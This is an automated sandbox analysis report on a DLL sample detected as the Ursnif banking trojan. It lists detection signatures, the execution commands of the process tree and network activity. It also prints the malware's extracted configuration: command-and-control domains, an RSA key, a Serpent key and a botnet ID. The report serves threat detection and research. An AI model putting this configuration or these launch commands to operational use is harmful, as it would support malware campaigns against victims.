Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report WTXuYxax6d.dll

Overview

General Information

Sample Name:WTXuYxax6d.dll
Analysis ID:527046
MD5:cbe2a109ef92af54de51a534980151a7
SHA1:e71ab85a35df851229f87fde059ad35ed167bdbc
SHA256:450a436cf830b03533a2ce0d8d40724d61c8b0e5f8164413c05d2c870b4ba8eb
Tags:dllgeoGoziISFBITAursnif
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for domain / URL
Writes or reads registry keys via WMI
Writes registry values via WMI
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Tries to load missing DLLs
Contains functionality to read the PEB
Registers a DLL
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6980 cmdline: loaddll32.exe "C:\Users\user\Desktop\WTXuYxax6d.dll" MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 6992 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\WTXuYxax6d.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 7012 cmdline: rundll32.exe "C:\Users\user\Desktop\WTXuYxax6d.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • regsvr32.exe (PID: 7000 cmdline: regsvr32.exe /s C:\Users\user\Desktop\WTXuYxax6d.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
    • iexplore.exe (PID: 7020 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
      • iexplore.exe (PID: 7104 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:7020 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • rundll32.exe (PID: 7052 cmdline: rundll32.exe C:\Users\user\Desktop\WTXuYxax6d.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 3684 cmdline: rundll32.exe C:\Users\user\Desktop\WTXuYxax6d.dll,azfdnkcrayghb MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6164 cmdline: rundll32.exe C:\Users\user\Desktop\WTXuYxax6d.dll,bngggbakts MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "v1wySnSj0/Qezkq1+zqVG7OQdnxYD8ELZYNPMCkM69BOSUxuoiK8V9jGPFM/rZ9NhfGzVodUM3YW0nB89rcH84RZYG8DLN6HQCkubhXRasaUA7K7h+3lZamvjyookCKgwBWzlu6vCX1eURNonlpROKDMQKBVqofzDshoxJHbAdjZcKqCfEt5vgt07jQB8OABEnd9fROXGjobZcsdaOkEjTvELBFteszn3jqJa1HvAPkpE5gs00qstYhkLp1L+MgFUoKXEL4WViIcGGNpbyyXZKBlebQs4TypEMrC0SUg0PsB7mmSQ4ESN3oL02+qpL14r8rTcWPMVTQH9/bLARbe3XOvj+AriFcBjSRm8ai2Vy0=", "c2_domain": ["microsoft.com/windowsdisabler", "https://technoshoper.com", "https://avolebukoneh.website", "http://technoshoper.com", "http://avolebukoneh.website"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000003.620315557.00000000053B8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000005.00000002.883888908.0000000004D49000.00000004.00000040.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
      00000005.00000002.884237946.00000000052F8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000005.00000003.613835753.00000000052F8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000003.00000003.612905346.0000000004FD8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 67 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            5.2.rundll32.exe.2b80000.2.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              0.2.loaddll32.exe.920000.2.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                3.2.rundll32.exe.a60000.2.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                  0.2.loaddll32.exe.a80000.3.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                    2.2.regsvr32.exe.4ea94a0.4.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                      Click to see the 23 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 3.2.rundll32.exe.a60000.2.unpackMalware Configuration Extractor: Ursnif {"RSA Public Key": "v1wySnSj0/Qezkq1+zqVG7OQdnxYD8ELZYNPMCkM69BOSUxuoiK8V9jGPFM/rZ9NhfGzVodUM3YW0nB89rcH84RZYG8DLN6HQCkubhXRasaUA7K7h+3lZamvjyookCKgwBWzlu6vCX1eURNonlpROKDMQKBVqofzDshoxJHbAdjZcKqCfEt5vgt07jQB8OABEnd9fROXGjobZcsdaOkEjTvELBFteszn3jqJa1HvAPkpE5gs00qstYhkLp1L+MgFUoKXEL4WViIcGGNpbyyXZKBlebQs4TypEMrC0SUg0PsB7mmSQ4ESN3oL02+qpL14r8rTcWPMVTQH9/bLARbe3XOvj+AriFcBjSRm8ai2Vy0=", "c2_domain": ["microsoft.com/windowsdisabler", "https://technoshoper.com", "https://avolebukoneh.website", "http://technoshoper.com", "http://avolebukoneh.website"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: WTXuYxax6d.dllVirustotal: Detection: 18%Perma Link
                      Source: WTXuYxax6d.dllReversingLabs: Detection: 25%
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: technoshoper.comVirustotal: Detection: 6%Perma Link
                      Source: avolebukoneh.websiteVirustotal: Detection: 6%Perma Link
                      Source: http://avolebukoneh.websiteVirustotal: Detection: 6%Perma Link
                      Source: 3.2.rundll32.exe.a60000.2.unpackAvira: Label: TR/Crypt.XPACK.Gen8
                      Source: 2.2.regsvr32.exe.9f0000.2.unpackAvira: Label: TR/Crypt.XPACK.Gen8
                      Source: 0.2.loaddll32.exe.920000.2.unpackAvira: Label: TR/Crypt.XPACK.Gen8
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_736D6AD0 CryptDecrypt,CryptImportKey,VirtualAlloc,0_2_736D6AD0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_736D61F0 DllRegisterServer,VirtualAlloc,VirtualAlloc,CryptSetKeyParam,CryptAcquireContextA,CryptImportKey,CryptDecrypt,CryptReleaseContext,CryptDestroyKey,CryptImportKey,CryptDecrypt,VirtualAlloc,VirtualAlloc,0_2_736D61F0
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_736D6AD0 CryptDecrypt,CryptImportKey,VirtualAlloc,2_2_736D6AD0
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_736D61F0 DllRegisterServer,VirtualAlloc,VirtualAlloc,CryptSetKeyParam,CryptAcquireContextA,CryptImportKey,CryptDecrypt,CryptReleaseContext,CryptDestroyKey,CryptImportKey,CryptDecrypt,VirtualAlloc,VirtualAlloc,2_2_736D61F0
                      Source: WTXuYxax6d.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
                      Source: unknownHTTPS traffic detected: 104.26.7.139:443 -> 192.168.2.6:49823 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.7.139:443 -> 192.168.2.6:49821 version: TLS 1.2
                      Source: WTXuYxax6d.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_736DA676 FindFirstFileExW,0_2_736DA676
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_736DA676 FindFirstFileExW,2_2_736DA676

                      Networking:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\regsvr32.exeDomain query: avolebukoneh.website
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 45.9.20.245 187Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeDomain query: technoshoper.com
                      Source: Joe Sandbox ViewASN Name: DEDIPATH-LLCUS DEDIPATH-LLCUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
                      Source: Joe Sandbox ViewIP Address: 104.26.7.139 104.26.7.139
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50064 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
                      Source: de-ch[1].htm.6.drString found in binary or memory: <a href="https://www.facebook.com/" target="_blank" data-piitxt="facebooklite" piiurl="https://www.facebook.com/"> equals www.facebook.com (Facebook)
                      Source: msapplication.xml0.4.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x5b7697ab,0x01d7e09b</date><accdate>0x5bc2e279,0x01d7e09b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
                      Source: msapplication.xml5.4.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x5cea86ad,0x01d7e09b</date><accdate>0x5d098694,0x01d7e09b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
                      Source: msapplication.xml7.4.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x5d6da6d7,0x01d7e09b</date><accdate>0x5d8ca4fa,0x01d7e09b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
                      Source: de-ch[1].htm.6.drString found in binary or memory: <link rel="preconnect" href="img-s-msn-com.akamaized.net" /><link rel="preconnect" href="c.msn.com" /><link rel="preconnect" href="c.msn.cn" /><link rel="preconnect" href="https://www.bing.com" /><link rel="preconnect" href="//web.vortex.data.msn.com" /><link rel="dns-prefetch" href="img-s-msn-com.akamaized.net" /><link rel="dns-prefetch" href="c.msn.com" /><link rel="dns-prefetch" href="c.msn.cn" /><link rel="dns-prefetch" href="https://www.bing.com" /><link rel="dns-prefetch" href="//web.vortex.data.msn.com" /><link rel="canonical" href="https://www.msn.com/de-ch/" /><meta name="msapplication-TileColor" content="#224f7b"/><meta name="msapplication-TileImage" content="//static-global-s-msn-com.akamaized.net/hp-neu/sc/1f/08ced4.png"/><meta name="msapplication-config" content="none"/> <title>MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365</title> equals www.hotmail.com (Hotmail)
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: glich.",errorFooterText:"Zu Twitter wechseln",taskLinks:"Benachrichtigungen|https://twitter.com/i/notifications;Ich|#;Abmelden|#"}],xbox:[{header:"Spotlight",content:"",footerText:"Alle anzeigen",footerUrl:"",taskLinks:"me_groove_taskLinks_store|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play|https://aka.ms/Ixhi8e;me_groove_taskLinks_try|https://aka.ms/msvmj1"},{header:"Meine tolle Wiedergabeliste",headerUrl:"https://aka.ms/qeqf5y",content:"",errorMessage:"",taskLinks:"me_groove_taskLinks_store|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play|https://aka.ms/Ixhi8e;me_groove_taskLinks_try|https://aka.ms/msvmj1"}],bingrewards:[{header:"Pr equals www.twitter.com (Twitter)
                      Source: de-ch[1].htm.6.drString found in binary or memory: hren, die sich auf Ihren Internetdatenverkehr auswirken.<br/><br/><a href=\""+e.html(f)+'" onclick="window.location.reload(true)">Klicken Sie hier<\/a> um diese Seite erneut zu laden, oder besuchen Sie: <a href="'+i+'">'+i+"<\/a><\/p><\/div><div id='errorref'><span>Ref 1: "+e.html(o(t.clientSettings.aid))+"&nbsp;&nbsp;&nbsp;Ref 2: "+e.html(t.clientSettings.sid||"000000")+"&nbsp;&nbsp;&nbsp;Ref 3: "+e.html((new r.Date).toUTCString())+"<\/span><\/div><\/div>"});ot({errId:1512,errMsg:n})}function ot(n){require(["track"],function(t){var i={errId:n.errId,errMsg:n.errMsg,reportingType:0};t.trackAppErrorEvent(i)})}function tt(){var n=v(arguments);a(l(n,b),n,!0)}function st(){var n=v(arguments);a(l(n,h),n)}function ht(){var n=v(arguments);a(l(n,y),n)}function ct(n){(r.console||{}).timeStamp?console.timeStamp(n):(r.performance||{}).mark&&r.performance.mark(n)}var w=0,it=-1,b=0,h=1,y=2,s=[],p,k,rt,o,d=!1,c=Math.random()*100<=-1;return ut(r,function(n,t,i,r){return w++,n=nt(n,t,i,r," [ENDMESSAGE]"),n&&tt("[SCRIPTERROR] "+n),!0}),c&&require(["jquery","c.deferred"],function(n){k=!0;rt=n;s.length&&g()}),{error:tt,fatalError:et,unhandledErrorCount:function(){return w},perfMark:ct,warning:st,information:ht}});require(["viewAwareInit"],function(n){n({size2row:"(min-height: 48.75em)",size1row:"(max-height: 48.74em)",size4column:"(min-width: 72em)",size3column:"(min-width: 52.313em) and (max-width: 71.99em)",size2column:"(min-width: 43.75em) and (max-width: 52.303em)",size2rowsize4column:"(min-width: 72em) and (min-height: 48.75em)",size2rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (min-height: 48.75em)",size2rowsize2column:"(max-width: 52.303em) and (min-height: 48.75em)",size1rowsize4column:"(min-width: 72em) and (max-height: 48.74em)",size1rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (max-height: 48.74em)",size1rowsize2column:"(max-width: 52.303em) and (max-height: 48.74em)"})});require(["deviceInit"],function(n){n({AllowTransform3d:"false",AllowTransform2d:"true",RtlScrollLeftAdjustment:"none",ShowMoveTouchGestures:"true",SupportFixedPosition:"true",UseCustomMatchMedia:null,Viewport_Behavior:"Default",Viewport_Landscape:null,Viewport:"width=device-width,initial-scale=1.0",IsMobileDevice:"false"})})</script><meta property="sharing_url" content="https://www.msn.com/de-ch"/><meta property="og:url" content="https://www.msn.com/de-ch/"/><meta property="og:title" content="MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365"/><meta property="twitter:card" content="summary_large_image"/><meta property="og:type" content="website"/><meta property="og:site_name" content="MSN"/><meta property="og:image" content="https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg"/><link rel="shortcut icon" href="//static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico" /><style>@media screen and (max-width:78.99em) and (min-width:58.875em){.layout-none:not(.mod1) .pos2{left:0}}.ie8 .grid .pick4~li.pick
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.facebook.com (Facebook)
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.twitter.com (Twitter)
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: ter erneut.",viewInboxErrorMessage:"Wenn beim Anzeigen Ihres Posteingangs weiterhin ein Problem auftritt, besuchen Sie",taskLinks:"Verfassen|https://outlook.live.com/mail/deeplink/compose;Kalender|https://outlook.live.com/calendar",piiText:"Read Outlook Email",piiUrl:"http://www.hotmail.msn.com/pii/ReadOutlookEmail/"}],office:[{header:"Office",content:"Zeigen Sie Ihre zuletzt verwendeten Dokumente an oder erstellen Sie kostenlos mit Office Online ein neues.",footerText:"Anmelden",footerUrl:"[[signin]]",ssoAutoRefresh:!0,taskLinks:"Word Online|https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel Online|https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway|https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoint Online|https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site"},{header:"Aktuelle Dokumente",headerUrl:"https://onedrive.live.com/#qt=mru",content:"Wird geladen ...",noContent:"Dieser Ordner ist leer. Klicken Sie unten, um ein neues Dokument zu erstellen.",errorMessage:"Keine Verbindung mit Office Online m equals www.hotmail.com (Hotmail)
